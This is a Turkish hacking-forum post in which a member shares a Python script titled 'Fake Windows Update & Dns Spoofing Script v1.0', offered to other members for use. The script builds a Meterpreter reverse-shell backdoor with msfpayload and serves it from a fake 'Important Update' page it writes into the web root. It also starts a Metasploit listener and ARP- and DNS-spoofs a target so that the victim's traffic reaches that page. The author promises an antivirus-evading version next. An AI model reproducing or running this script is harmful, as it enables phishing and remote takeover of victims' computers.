THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Fake Windows Update & Dns Spoofing Script v1.0

sk3r0ot - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Mesajlar:
53
Konular:
29
Teşekkür (Etti):
25
Teşekkür (Aldı):
124
Ticaret:
(0) %
19-03-2013 15:34
#1
Cool
Fake Windows Update & Dns Spoofing Script v1.0
THT Uyeleri İçin Kodlamış Oldugum Script'i Paylaşma Zamanı Geldi ..


Yazdıgım Script'in Özellikleri ;

[+] ArkaKapı-[Backdoor] Dosyası Oluşturuluyor ..
[+] ArkaKapı HTML Enjekte Ediliyor ..
[+] MsfConsole Framework Baslatiliyor ..
[+] Apache Web Server Baslatiliyor ..
[+] Dns Onbellegi Zehirleniyor ..
[+] Arp Spoof Baslatiliyor ..


Backdoor.exe Fud Değil Yakında v2.0'sini Yazacağım Full Fud Şekilde Olacak Takipte Kalın ..

Kodlama Tamamen Bana Aittir , Paylaştıgınız Yerlerde Alıntı Oldugunu Belirtirseniz Emeğe Saygı Göstermiş Olursunuz .

Kod:
#!/usr/bin/env python
#-*- coding: utf-8 -*-
import os
import sys
import time
import subprocess
import re
from time import sleep

if os.getuid() != 0: 
  print 'requires root privileges.'
  sys.exit(1) 

def usage():
  if len(sys.argv) != 7:
    print """
\t=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
\t= Fake Windows Update Script                =
\t= (C)opyright ~ 2012 Sk3r0ot                = 
\t= Bug : Sk3r0ot@msn.com                     =
\t= Licence : Sk3r0ot                         =
\t=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
"""
    print 'Bilgi: ./DnsAttack.py [INTERFACE] [RHOST] [LHOST] [GATEWAY] [LPORT] [DOSYAISMI]'
    print 'Ornek: ./DnsAttack.py eth0 192.168.1.50 192.168.1.49 192.168.1.1 4444 Backdoor.exe' 
    sys.exit(1)
usage()
print """ 
\t #~=~=~=~==~=~=~==~=~=~==~=~=~=~=~=~#
\t # Fake Windows Update Script       #
\t # Bug İletişim : Sk3r0ot@msn.Com   #
\t # Kodlayan : Sk3r@ot	              #
\t #~=~=~=~==~=~=~==~=~=~==~=~=~=~=~=~#
\t
\t Bilgi: ./DnsAttack.py [INTERFACE] [RHOST] [LHOST] [GATEWAY] [LPORT] [DOSYAISMI]
\t Ornek: ./DnsAttack.py eth0 192.168.1.50 192.168.1.49 192.168.1.1 4444 Backdoor.exe
\t -------------------------
\t < “~ Dns Spoofing & Arp Spoofing - Fake Win Update Script v1.0 ~” >
\t -------------------------
\t  \
\t   \
\t                   .::!!!!!!!:.
\t  .!!!!!:.                        .:!!!!!!!!!!!!
\t  ~~~~!!!!!!.                 .:!!!!!!!!!UWWW$$$ 
\t      :$$NWX!!:           .:!!!!!!XUWW$$$$$$$$$P 
\t      $$$$$##WX!:      .<!!!!UW$$$$"  $$$$$$$$# 
\t      $$$$$  $$$UX   :!!UW$$$$$$$$$   4$$$$$* 
\t      ^$$$B  $$$$\     $$$$$$$$$$$$   d$$R" 
\t        "*$bd$$$$      '*$$$$$$$$$$$o+#" 
\t                                     
\t  ____  _    _____       ____        _   
\t / ___|| | _|___ / _ __ / __ \  ___ | |_ 
\t \___ \| |/ / |_ \| '__/ / _` |/ _ \| __|
\t  ___) |   < ___) | | | | (_| | (_) | |_ 
\t |____/|_|\_\____/|_|  \ \__,_|\___/ \__|
\t
"""
INTERFACE = sys.argv[1]
RHOST = sys.argv[2]
LHOST = sys.argv[3]
GATEWAY = sys.argv[4]
LPORT = sys.argv[5]
mount = sys.argv[6]

print '[+] ArkaKapı-[Backdoor] Dosyası Oluşturuluyor ..'
trojan = subprocess.Popen('xterm -e "msfpayload windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s X > /var/www/%s"' %(LHOST,LPORT,mount),shell=True).wait()

print '[+] ArkaKapı HTML Enjekte Ediliyor ..'
file1 = subprocess.Popen("""gnome-terminal -e mkdir /var/www/inject.bus && echo '<html xmlns="http://www.w3.org/1999/xhtml"> <head> <**** http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Windows Update</title> </head> <body> <p>&nbsp;</p> <p><center><img src="windowsupdate.jpeg" width="256" height="256" alt="Update" /></center></p> <p>&nbsp; <center><strong>Important Update</strong>:</p> <p>Found critical vulnerability in your system</p> <p>Please download and install this file for patch this vulnerability before continuing.</p></center>' > /var/www/index.html && echo "<p align="center"><input type="button" name="btnDownload" value='"Download' 'Update"' onclick="window.open"('%s','download'); return false;"'"/></p> </body> </html>"' >> /var/www/index.html && chmod 777 /var/www/index.html""" %(mount),shell=True).wait()

print '[+] ****sploit Framework Baslatiliyor ..'
#****sploit = 'xterm -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s #E &' %(LHOST,LPORT)
#os.system(****sploit)
#sleep(5)
****sploit = subprocess.Popen('xterm -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s E &' %(LHOST,LPORT),shell=True).wait()
sleep(2)

print '[+] Apache Web Server Baslatiliyor ..'
apacheserver = subprocess.Popen('xterm -fg blue -e /etc/init.d/apache2 start',shell=True).wait()
try:
	my_dnsspoofing = open('/tmp/dnsspoofing.dns' , 'w')
	my_dnsspoofing.write("%s *" %LHOST)
	my_dnsspoofing.close()
except IOerror:	
	print 'Error in Writing in the File'
else:
	print '[+] Dns Onbellegi Zehirleniyor ..'
	dnsspoof = 'xterm -geometry 70x10+0+900 -fg blue -e dnsspoof -i %s -f /tmp/dnsspoofing.dns &' %INTERFACE
	os.system(dnsspoof)
	sleep(1)
	print '[+] Arp Spoof Baslatiliyor ..'
	arpspoofing = 'xterm -geometry 90x10+0+900 -fg red -e arpspoof -i %s -t %s %s &' %(INTERFACE,RHOST,LHOST)
	os.system(arpspoofing)
	sleep(2)
	subprocess.Popen('rm -f /tmp/dnsspoofing.dns > /dev/null', shell=True).wait()

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler